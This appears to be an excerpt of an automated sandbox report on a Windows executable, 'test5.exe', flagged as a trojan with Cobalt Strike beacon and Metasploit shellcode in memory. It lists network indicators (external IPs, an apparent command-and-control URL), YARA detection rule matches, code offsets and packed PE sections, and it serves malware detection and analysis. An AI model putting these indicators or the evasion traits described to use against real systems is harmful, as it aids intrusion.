        Source: test5.exe, 00000000.00000002.2903186062.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/~
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
        Source: unknownHTTPS traffic detected: 47.90.135.102:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.34.5:443 -> 192.168.2.4:49732 version: TLS 1.2

        System Summary

        barindex
        Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
        Source: Process Memory Space: test5.exe PID: 6608, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B25C0 DuplicateHandle,GetCurrentThreadId,CreateWaitableTimerExW,CreateWaitableTimerExW,NtCreateWaitCompletionPacket,VirtualQuery,0_2_006B25C0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B0D80 LoadLibraryExW,LoadLibraryExW,NtCreateWaitCompletionPacket,NtAssociateWaitCompletionPacket,NtCancelWaitCompletionPacket,RtlGetCurrentPeb,RtlGetVersion,0_2_006B0D80
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B0980 NtCancelWaitCompletionPacket,SetWaitableTimer,NtAssociateWaitCompletionPacket,0_2_006B0980
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006820600_2_00682060
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006E464C0_2_006E464C
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006BD8E00_2_006BD8E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0068C9800_2_0068C980
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006C4AE00_2_006C4AE0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006A5DC00_2_006A5DC0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_00692EA00_2_00692EA0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006A4FA00_2_006A4FA0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0068A0800_2_0068A080
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_007021600_2_00702160
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006C71800_2_006C7180
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006A92600_2_006A9260
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006BE2600_2_006BE260
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006DB2600_2_006DB260
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006AA2200_2_006AA220
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006C92E00_2_006C92E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006D83400_2_006D8340
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_007003400_2_00700340
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B34600_2_006B3460
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006BF4200_2_006BF420
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006EA4E00_2_006EA4E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006AC4800_2_006AC480
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006BB5400_2_006BB540
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006AD5200_2_006AD520
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006AB5E00_2_006AB5E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_007025E00_2_007025E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006AB5E00_2_006AB5E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_007046400_2_00704640
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006976050_2_00697605
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B76E00_2_006B76E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0068D7600_2_0068D760
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006D47600_2_006D4760
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006CF7400_2_006CF740
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006947930_2_00694793
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006DF8200_2_006DF820
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006E88000_2_006E8800
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0069F8C00_2_0069F8C0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006979E00_2_006979E0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006DAAE00_2_006DAAE0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006ECA800_2_006ECA80
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006FFB200_2_006FFB20
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006EDB090_2_006EDB09
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_00683B000_2_00683B00
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006D0B000_2_006D0B00
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006BAB800_2_006BAB80
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006A2C900_2_006A2C90
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_00696D200_2_00696D20
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006AFD200_2_006AFD20
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006A3D000_2_006A3D00
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_00690DC00_2_00690DC0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006DDDC00_2_006DDDC0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006A8D800_2_006A8D80
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B6EA00_2_006B6EA0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0069DFE00_2_0069DFE0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_00695FC00_2_00695FC0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C1B1400_2_0000021551C1B140
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C0E0E80_2_0000021551C0E0E8
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551BFD7840_2_0000021551BFD784
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C1BAB00_2_0000021551C1BAB0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C061C00_2_0000021551C061C0
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C0FD180_2_0000021551C0FD18
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C103DC0_2_0000021551C103DC
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551C10E900_2_0000021551C10E90
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_00000215537602D70_2_00000215537602D7
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_000002155375F15F0_2_000002155375F15F
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_000002155375F8230_2_000002155375F823
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_000002155375D52F0_2_000002155375D52F
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_000002155374CBCB0_2_000002155374CBCB
        Source: C:\Users\user\Desktop\test5.exeCode function: String function: 006E7680 appears 42 times
        Source: C:\Users\user\Desktop\test5.exeCode function: String function: 006B5660 appears 31 times
        Source: C:\Users\user\Desktop\test5.exeCode function: String function: 006B8420 appears 584 times
        Source: C:\Users\user\Desktop\test5.exeCode function: String function: 006E9320 appears 533 times
        Source: C:\Users\user\Desktop\test5.exeCode function: String function: 006B7C00 appears 60 times
        Source: test5.exeStatic PE information: Number of sections : 15 > 10
        Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: Process Memory Space: test5.exe PID: 6608, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: test5.exeStatic PE information: Section: /19 ZLIB complexity 0.9990767045454545
        Source: test5.exeStatic PE information: Section: /32 ZLIB complexity 0.9969308035714286
        Source: test5.exeStatic PE information: Section: /65 ZLIB complexity 1.0000639265719207
        Source: test5.exeStatic PE information: Section: /78 ZLIB complexity 0.9962546816479401
        Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@1/0@1/2
        Source: test5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\test5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: test5.exeVirustotal: Detection: 6%
        Source: test5.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
        Source: test5.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
        Source: test5.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
        Source: test5.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
        Source: test5.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
        Source: test5.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
        Source: test5.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
        Source: test5.exeString found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
        Source: test5.exeString found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
        Source: test5.exeString found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
        Source: test5.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
